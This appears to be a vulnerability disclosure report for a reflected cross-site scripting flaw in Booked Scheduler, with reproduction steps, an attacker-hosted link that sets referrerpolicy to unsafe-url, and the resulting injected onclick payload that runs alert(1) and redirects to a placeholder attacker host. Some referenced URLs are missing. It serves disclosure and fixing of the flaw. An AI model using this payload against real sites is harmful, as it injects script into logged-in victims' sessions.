Cross-site Scripting (XSS) - Reflected in effgarces/bookedscheduler
Feb 8th 2022
- Setup the Booked Scheduler locally.URL like the following.
Login as valid user.
Make an reservation from the dashboard.
Open the information you reserved.URL like the following
- The attacker creates and installs a web page on another server (http://attacker). The contents are as follows.
<a href="http://192.168.5.5/phpsch/Web/reservation.php?rn=62020af2eee4d833634703" referrerpolicy="unsafe-url">link</a>
- The attacker asks the victim (who is already logged in) to access a URL like the following.
The victim clicks on the link and is presented with a page to edit the attacker's reservation.
There are three buttons in the upper right corner, and if the victim clicks on the "Cancel" button, an alert will pop up (and then the victim will be redirected to the attacker's page).
The HTML will look like this
<button type="button" class="btn btn-default" onclick="window.location='http://attacker/bookedxss.html?';alert(1)//'">
＃ Operation was confirmed with the Chrome browser for Windows.